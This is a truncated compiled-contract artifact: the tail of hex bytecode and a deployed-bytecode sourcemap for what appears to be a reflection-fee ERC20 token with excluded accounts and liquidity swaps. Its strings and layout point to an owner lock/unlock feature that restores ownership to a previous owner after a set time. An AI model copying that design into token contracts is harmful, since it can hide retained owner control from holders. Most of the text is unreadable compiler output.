2062652067726561746572207468616e207a65726f45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573734578636c75646564206164647265737365732063616e6e6f742063616c6c20746869732066756e6374696f6e596f7520646f6e27742068617665207065726d697373696f6e20746f20756e6c6f636b45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e379440c2b7786635f664a15c8719517ee2189edbf65722808810a3b921b5e7c64736f6c634300060c0033
Deployed Bytecode Sourcemap
26289:19082:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34466:98;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;28710:83;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29910:161;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;31434:87;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;27255:51;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;28987:95;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;30079:716;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;32358:253;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;28896:83;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;33074:479;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;30803:218;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;27066:26;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;31529:377;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34221:111;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;31914:436;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;17962:109;;;;;;;;;;;;;:::i;:::-;;27313:38;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;27427:40;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;32619:447;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;38363:123;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;27153:33;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;29090:198;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;16384:148;;;;;;;;;;;;;:::i;:::-;;27480:46;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;31306:120;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;15741:79;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;34576:122;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;28801:87;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31029:269;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;17394:293;;;;;;;;;;;;;:::i;:::-;;29300:93;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;29401:350;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;16939:89;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;27364:22;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;34879:171;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;17786:27;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;34709:162;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;18077:110;;;;;;;;;;;;;:::i;:::-;;17104:214;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;29759:143;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;34344:110;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;16687:244;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34466:98;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34550:6:::1;34540:7;:16;;;;34466:98:::0;:::o;28710:83::-;28747:13;28780:5;28773:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28710:83;:::o;29910:161::-;29985:4;30002:39;30011:12;:10;:12::i;:::-;30025:7;30034:6;30002:8;:39::i;:::-;30059:4;30052:11;;29910:161;;;;:::o;31434:87::-;31476:7;31503:10;;31496:17;;31434:87;:::o;27255:51::-;;;:::o;28987:95::-;29040:7;29067;;29060:14;;28987:95;:::o;30079:716::-;30177:4;30208;30197:15;;:7;;;;;;;;;;;:15;;;30194:594;;;30246:1;30228:20;;:6;:20;;;;:45;;;;;30271:1;30252:21;;:7;;;;;;;;;;;:21;;;30228:45;30225:132;;;30285:9;30275:7;;:19;;;;;;;;;;;;;;;;;;30225:132;;;30331:7;;;;;;;;;;;30318:20;;:9;:20;;;;30310:47;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;30225:132;30368:36;30378:6;30386:9;30397:6;30368:9;:36::i;:::-;30415:121;30424:6;30432:12;:10;:12::i;:::-;30446:89;30484:6;30446:89;;;;;;;;;;;;;;;;;:11;:19;30458:6;30446:19;;;;;;;;;;;;;;;:33;30466:12;:10;:12::i;:::-;30446:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;30415:8;:121::i;:::-;30554:4;30547:11;;;;30194:594;30596:36;30606:6;30614:9;30625:6;30596:9;:36::i;:::-;30643:121;30652:6;30660:12;:10;:12::i;:::-;30674:89;30712:6;30674:89;;;;;;;;;;;;;;;;;:11;:19;30686:6;30674:19;;;;;;;;;;;;;;;:33;30694:12;:10;:12::i;:::-;30674:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;30643:8;:121::i;:::-;30782:4;30775:11;;30079:716;;;;;;:::o;32358:253::-;32424:7;32463;;32452;:18;;32444:73;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32528:19;32551:10;:8;:10::i;:::-;32528:33;;32579:24;32591:11;32579:7;:11;;:24;;;;:::i;:::-;32572:31;;;32358:253;;;:::o;28896:83::-;28937:5;28962:9;;;;;;;;;;;28955:16;;28896:83;:::o;33074:479::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33156:11:::1;:20;33168:7;33156:20;;;;;;;;;;;;;;;;;;;;;;;;;33148:60;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;33224:9;33219:327;33243:9;:16;;;;33239:1;:20;33219:327;;;33301:7;33285:23;;:9;33295:1;33285:12;;;;;;;;;;;;;;;;;;;;;;;;;:23;;;33281:254;;;33344:9;33373:1;33354:9;:16;;;;:20;33344:31;;;;;;;;;;;;;;;;;;;;;;;;;33329:9;33339:1;33329:12;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;33413:1;33394:7;:16;33402:7;33394:16;;;;;;;;;;;;;;;:20;;;;33456:5;33433:11;:20;33445:7;33433:20;;;;;;;;;;;;;;;;:28;;;;;;;;;;;;;;;;;;33480:9;:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33514:5;;33281:254;33261:3;;;;;;;33219:327;;;;33074:479:::0;:::o;30803:218::-;30891:4;30908:83;30917:12;:10;:12::i;:::-;30931:7;30940:50;30979:10;30940:11;:25;30952:12;:10;:12::i;:::-;30940:25;;;;;;;;;;;;;;;:34;30966:7;30940:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;30908:8;:83::i;:::-;31009:4;31002:11;;30803:218;;;;:::o;27066:26::-;;;;:::o;31529:377::-;31581:14;31598:12;:10;:12::i;:::-;31581:29;;31630:11;:19;31642:6;31630:19;;;;;;;;;;;;;;;;;;;;;;;;;31629:20;31621:77;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31710:15;31734:19;31745:7;31734:10;:19::i;:::-;31709:44;;;;;;;31782:28;31802:7;31782;:15;31790:6;31782:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;31764:7;:15;31772:6;31764:15;;;;;;;;;;;;;;;:46;;;;31831:20;31843:7;31831;;:11;;:20;;;;:::i;:::-;31821:7;:30;;;;31875:23;31890:7;31875:10;;:14;;:23;;;;:::i;:::-;31862:10;:36;;;;31529:377;;;:::o;34221:111::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34320:4:::1;34290:18;:27;34309:7;34290:27;;;;;;;;;;;;;;;;:34;;;;;;;;;;;;;;;;;;34221:111:::0;:::o;31914:436::-;32004:7;32043;;32032;:18;;32024:62;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32102:17;32097:246;;32137:15;32161:19;32172:7;32161:10;:19::i;:::-;32136:44;;;;;;;32202:7;32195:14;;;;;32097:246;32244:23;32275:19;32286:7;32275:10;:19::i;:::-;32242:52;;;;;;;32316:15;32309:22;;;31914:436;;;;;:::o;17962:109::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17864:7:::1;;;;;;;;;;;17863:8;17855:17;;;::::0;::::1;;18034:4:::2;18024:7;;:14;;;;;;;;;;;;;;;;;;18050:15;;;;;;;;;;17962:109::o:0;27313:38::-;;;:::o;27427:40::-;;;;;;;;;;;;;:::o;32619:447::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32816:11:::1;:20;32828:7;32816:20;;;;;;;;;;;;;;;;;;;;;;;;;32815:21;32807:61;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;32901:1;32882:7;:16;32890:7;32882:16;;;;;;;;;;;;;;;;:20;32879:108;;;32938:37;32958:7;:16;32966:7;32958:16;;;;;;;;;;;;;;;;32938:19;:37::i;:::-;32919:7;:16;32927:7;32919:16;;;;;;;;;;;;;;;:56;;;;32879:108;33020:4;32997:11;:20;33009:7;32997:20;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;33035:9;33050:7;33035:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32619:447:::0;:::o;38363:123::-;38427:4;38451:18;:27;38470:7;38451:27;;;;;;;;;;;;;;;;;;;;;;;;;38444:34;;38363:123;;;:::o;27153:33::-;;;;:::o;29090:198::-;29156:7;29180:11;:20;29192:7;29180:20;;;;;;;;;;;;;;;;;;;;;;;;;29176:49;;;29209:7;:16;29217:7;29209:16;;;;;;;;;;;;;;;;29202:23;;;;29176:49;29243:37;29263:7;:16;29271:7;29263:16;;;;;;;;;;;;;;;;29243:19;:37::i;:::-;29236:44;;29090:198;;;;:::o;16384:148::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16491:1:::1;16454:40;;16475:6;::::0;::::1;;;;;;;;16454:40;;;;;;;;;;;;16522:1;16505:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;16384:148::o:0;27480:46::-;;;;:::o;31306:120::-;31374:4;31398:11;:20;31410:7;31398:20;;;;;;;;;;;;;;;;;;;;;;;;;31391:27;;31306:120;;;:::o;15741:79::-;15779:7;15806:6;;;;;;;;;;;15799:13;;15741:79;:::o;34576:122::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34678:12:::1;34662:13;:28;;;;34576:122:::0;:::o;28801:87::-;28840:13;28873:7;28866:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28801:87;:::o;31029:269::-;31122:4;31139:129;31148:12;:10;:12::i;:::-;31162:7;31171:96;31210:15;31171:96;;;;;;;;;;;;;;;;;:11;:25;31183:12;:10;:12::i;:::-;31171:25;;;;;;;;;;;;;;;:34;31197:7;31171:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;31139:8;:129::i;:::-;31286:4;31279:11;;31029:269;;;;:::o;17394:293::-;17464:10;17446:28;;:14;;;;;;;;;;;:28;;;17438:76;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17539:9;;17533:3;:15;17525:60;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17630:14;;;;;;;;;;;17601:44;;17622:6;;;;;;;;;;17601:44;;;;;;;;;;;;17665:14;;;;;;;;;;;17656:6;;:23;;;;;;;;;;;;;;;;;;17394:293::o;29300:93::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29377:8:::1;29367:7;;:18;;;;;;;;;;;;;;;;;;29300:93:::0;:::o;29401:350::-;29479:4;29510;29499:15;;:7;;;;;;;;;;;:15;;;29496:248;;;29548:7;;;;;;;;;;;29535:20;;:9;:20;;;;29527:47;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29585:42;29595:12;:10;:12::i;:::-;29609:9;29620:6;29585:9;:42::i;:::-;29645:4;29638:11;;;;29496:248;29678:42;29688:12;:10;:12::i;:::-;29702:9;29713:6;29678:9;:42::i;:::-;29738:4;29731:11;;29401:350;;;;;:::o;16939:89::-;16984:7;17011:9;;17004:16;;16939:89;:::o;27364:22::-;;;;;;;;;;;;;:::o;34879:171::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34980:8:::1;34956:21;;:32;;;;;;;;;;;;;;;;;;35004:38;35033:8;35004:38;;;;;;;;;;;;;;;;;;;;34879:171:::0;:::o;17786:27::-;;;;;;;;;;;;;:::o;34709:162::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34803:60:::1;34847:5;34803:25;34815:12;34803:7;;:11;;:25;;;;:::i;:::-;:29;;:60;;;;:::i;:::-;34788:12;:75;;;;34709:162:::0;:::o;18077:110::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17934:7:::1;;;;;;;;;;;17926:16;;;::::0;::::1;;18148:5:::2;18138:7;;:15;;;;;;;;;;;;;;;;;;18165:16;;;;;;;;;;18077:110::o:0;17104:214::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17185:6:::1;::::0;::::1;;;;;;;;17168:14;;:23;;;;;;;;;;;;;;;;;;17219:1;17202:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;17250:4;17244:3;:10;17232:9;:22;;;;17307:1;17270:40;;17291:6;::::0;::::1;;;;;;;;17270:40;;;;;;;;;;;;17104:214:::0;:::o;29759:143::-;29840:7;29867:11;:18;29879:5;29867:18;;;;;;;;;;;;;;;:27;29886:7;29867:27;;;;;;;;;;;;;;;;29860:34;;29759:143;;;;:::o;34344:110::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34441:5:::1;34411:18;:27;34430:7;34411:27;;;;;;;;;;;;;;;;:35;;;;;;;;;;;;;;;;;;34344:110:::0;:::o;16687:244::-;15963:12;:10;:12::i;:::-;15953:22;;:6;;;;;;;;;;:22;;;15945:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16796:1:::1;16776:22;;:8;:22;;;;16768:73;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16886:8;16857:38;;16878:6;::::0;::::1;;;;;;;;16857:38;;;;;;;;;;;;16915:8;16906:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;16687:244:::0;:::o;8149:106::-;8202:15;8237:10;8230:17;;8149:106;:::o;38494:337::-;38604:1;38587:19;;:5;:19;;;;38579:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;38685:1;38666:21;;:7;:21;;;;38658:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;38769:6;38739:11;:18;38751:5;38739:18;;;;;;;;;;;;;;;:27;38758:7;38739:27;;;;;;;;;;;;;;;:36;;;;38807:7;38791:32;;38800:5;38791:32;;;38816:6;38791:32;;;;;;;;;;;;;;;;;;38494:337;;;:::o;38839:1813::-;38977:1;38961:18;;:4;:18;;;;38953:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39054:1;39040:16;;:2;:16;;;;39032:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39124:1;39115:6;:10;39107:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39193:7;:5;:7::i;:::-;39185:15;;:4;:15;;;;:32;;;;;39210:7;:5;:7::i;:::-;39204:13;;:2;:13;;;;39185:32;39182:125;;;39250:12;;39240:6;:22;;39232:75;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39182:125;39602:28;39633:24;39651:4;39633:9;:24::i;:::-;39602:55;;39705:12;;39681:20;:36;39678:112;;39766:12;;39743:35;;39678:112;39810:24;39861:29;;39837:20;:53;;39810:80;;39919:19;:53;;;;;39956:16;;;;;;;;;;39955:17;39919:53;:91;;;;;39997:13;39989:21;;:4;:21;;;;39919:91;:129;;;;;40027:21;;;;;;;;;;;39919:129;39901:318;;;40098:29;;40075:52;;40171:36;40186:20;40171:14;:36::i;:::-;39901:318;40300:12;40315:4;40300:19;;40427:18;:24;40446:4;40427:24;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;40455:18;:22;40474:2;40455:22;;;;;;;;;;;;;;;;;;;;;;;;;40427:50;40424:96;;;40503:5;40493:15;;40424:96;40606:38;40621:4;40626:2;40629:6;40636:7;40606:14;:38::i;:::-;38839:1813;;;;;;:::o;4559:192::-;4645:7;4678:1;4673;:6;;4681:12;4665:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4705:9;4721:1;4717;:5;4705:17;;4742:1;4735:8;;;4559:192;;;;;:::o;36513:163::-;36554:7;36575:15;36592;36611:19;:17;:19::i;:::-;36574:56;;;;36648:20;36660:7;36648;:11;;:20;;;;:::i;:::-;36641:27;;;;36513:163;:::o;5957:132::-;6015:7;6042:39;6046:1;6049;6042:39;;;;;;;;;;;;;;;;;:3;:39::i;:::-;6035:46;;5957:132;;;;:::o;3656:181::-;3714:7;3734:9;3750:1;3746;:5;3734:17;;3775:1;3770;:6;;3762:46;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3828:1;3821:8;;;3656:181;;;;:::o;35311:419::-;35370:7;35379;35388;35397;35406;35415;35436:23;35461:12;35475:18;35497:20;35509:7;35497:11;:20::i;:::-;35435:82;;;;;;35529:15;35546:23;35571:12;35587:50;35599:7;35608:4;35614:10;35626;:8;:10::i;:::-;35587:11;:50::i;:::-;35528:109;;;;;;35656:7;35665:15;35682:4;35688:15;35705:4;35711:10;35648:74;;;;;;;;;;;;;;;;;;35311:419;;;;;;;:::o;4120:136::-;4178:7;4205:43;4209:1;4212;4205:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4198:50;;4120:136;;;;:::o;5010:471::-;5068:7;5318:1;5313;:6;5309:47;;;5343:1;5336:8;;;;5309:47;5368:9;5384:1;5380;:5;5368:17;;5413:1;5408;5404;:5;;;;;;:10;5396:56;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5472:1;5465:8;;;5010:471;;;;;:::o;40660:985::-;27923:4;27904:16;;:23;;;;;;;;;;;;;;;;;;40796:12:::1;40811:27;40836:1;40811:20;:24;;:27;;;;:::i;:::-;40796:42;;40849:17;40869:30;40894:4;40869:20;:24;;:30;;;;:::i;:::-;40849:50;;41177:22;41202:21;41177:46;;41268:22;41285:4;41268:16;:22::i;:::-;41421:18;41442:41;41468:14;41442:21;:25;;:41;;;;:::i;:::-;41421:62;;41533:35;41546:9;41557:10;41533:12;:35::i;:::-;41594:43;41609:4;41615:10;41627:9;41594:43;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27938:1;;;;27969:4:::0;27950:16;;:23;;;;;;;;;;;;;;;;;;40660:985;:::o;42844:834::-;42955:7;42951:40;;42977:14;:12;:14::i;:::-;42951:40;43016:11;:19;43028:6;43016:19;;;;;;;;;;;;;;;;;;;;;;;;;:46;;;;;43040:11;:22;43052:9;43040:22;;;;;;;;;;;;;;;;;;;;;;;;;43039:23;43016:46;43012:597;;;43079:48;43101:6;43109:9;43120:6;43079:21;:48::i;:::-;43012:597;;;43150:11;:19;43162:6;43150:19;;;;;;;;;;;;;;;;;;;;;;;;;43149:20;:46;;;;;43173:11;:22;43185:9;43173:22;;;;;;;;;;;;;;;;;;;;;;;;;43149:46;43145:464;;;43212:46;43232:6;43240:9;43251:6;43212:19;:46::i;:::-;43145:464;;;43281:11;:19;43293:6;43281:19;;;;;;;;;;;;;;;;;;;;;;;;;43280:20;:47;;;;;43305:11;:22;43317:9;43305:22;;;;;;;;;;;;;;;;;;;;;;;;;43304:23;43280:47;43276:333;;;43344:44;43362:6;43370:9;43381:6;43344:17;:44::i;:::-;43276:333;;;43410:11;:19;43422:6;43410:19;;;;;;;;;;;;;;;;;;;;;;;;;:45;;;;;43433:11;:22;43445:9;43433:22;;;;;;;;;;;;;;;;;;;;;;;;;43410:45;43406:203;;;43472:48;43494:6;43502:9;43513:6;43472:21;:48::i;:::-;43406:203;;;43553:44;43571:6;43579:9;43590:6;43553:17;:44::i;:::-;43406:203;43276:333;43145:464;43012:597;43633:7;43629:41;;43655:15;:13;:15::i;:::-;43629:41;42844:834;;;;:::o;36684:561::-;36734:7;36743;36763:15;36781:7;;36763:25;;36799:15;36817:7;;36799:25;;36846:9;36841:289;36865:9;:16;;;;36861:1;:20;36841:289;;;36931:7;36907;:21;36915:9;36925:1;36915:12;;;;;;;;;;;;;;;;;;;;;;;;;36907:21;;;;;;;;;;;;;;;;:31;:66;;;;36966:7;36942;:21;36950:9;36960:1;36950:12;;;;;;;;;;;;;;;;;;;;;;;;;36942:21;;;;;;;;;;;;;;;;:31;36907:66;36903:97;;;36983:7;;36992;;36975:25;;;;;;;;;36903:97;37025:34;37037:7;:21;37045:9;37055:1;37045:12;;;;;;;;;;;;;;;;;;;;;;;;;37037:21;;;;;;;;;;;;;;;;37025:7;:11;;:34;;;;:::i;:::-;37015:44;;37084:34;37096:7;:21;37104:9;37114:1;37104:12;;;;;;;;;;;;;;;;;;;;;;;;;37096:21;;;;;;;;;;;;;;;;37084:7;:11;;:34;;;;:::i;:::-;37074:44;;36883:3;;;;;;;36841:289;;;;37154:20;37166:7;;37154;;:11;;:20;;;;:::i;:::-;37144:7;:30;37140:61;;;37184:7;;37193;;37176:25;;;;;;;;37140:61;37220:7;37229;37212:25;;;;;;36684:561;;;:::o;6585:278::-;6671:7;6703:1;6699;:5;6706:12;6691:28;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6730:9;6746:1;6742;:5;;;;;;6730:17;;6854:1;6847:8;;;6585:278;;;;;:::o;35738:330::-;35798:7;35807;35816;35836:12;35851:24;35867:7;35851:15;:24::i;:::-;35836:39;;35886:18;35907:30;35929:7;35907:21;:30::i;:::-;35886:51;;35948:23;35974:33;35996:10;35974:17;35986:4;35974:7;:11;;:17;;;;:::i;:::-;:21;;:33;;;;:::i;:::-;35948:59;;36026:15;36043:4;36049:10;36018:42;;;;;;;;;35738:330;;;;;:::o;36076:429::-;36191:7;36200;36209;36229:15;36247:24;36259:11;36247:7;:11;;:24;;;;:::i;:::-;36229:42;;36282:12;36297:21;36306:11;36297:4;:8;;:21;;;;:::i;:::-;36282:36;;36329:18;36350:27;36365:11;36350:10;:14;;:27;;;;:::i;:::-;36329:48;;36388:23;36414:33;36436:10;36414:17;36426:4;36414:7;:11;;:17;;;;:::i;:::-;:21;;:33;;;;:::i;:::-;36388:59;;36466:7;36475:15;36492:4;36458:39;;;;;;;;;;36076:429;;;;;;;;:::o;41653:589::-;41779:21;41817:1;41803:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41779:40;;41848:4;41830;41835:1;41830:7;;;;;;;;;;;;;:23;;;;;;;;;;;41874:15;:20;;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41864:4;41869:1;41864:7;;;;;;;;;;;;;:32;;;;;;;;;;;41909:62;41926:4;41941:15;41959:11;41909:8;:62::i;:::-;42010:15;:66;;;42091:11;42117:1;42161:4;42188;42208:15;42010:224;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41653:589;;:::o;42250:513::-;42398:62;42415:4;42430:15;42448:11;42398:8;:62::i;:::-;42503:15;:31;;;42542:9;42575:4;42595:11;42621:1;42664;42707:7;:5;:7::i;:::-;42729:15;42503:252;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;42250:513;;:::o;37964:250::-;38021:1;38010:7;;:12;:34;;;;;38043:1;38026:13;;:18;38010:34;38007:46;;;38046:7;;38007:46;38091:7;;38073:15;:25;;;;38133:13;;38109:21;:37;;;;38177:1;38167:7;:11;;;;38205:1;38189:13;:17;;;;37964:250;:::o;44790:566::-;44893:15;44910:23;44935:12;44949:23;44974:12;44988:18;45010:19;45021:7;45010:10;:19::i;:::-;44892:137;;;;;;;;;;;;45058:28;45078:7;45058;:15;45066:6;45058:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;45040:7;:15;45048:6;45040: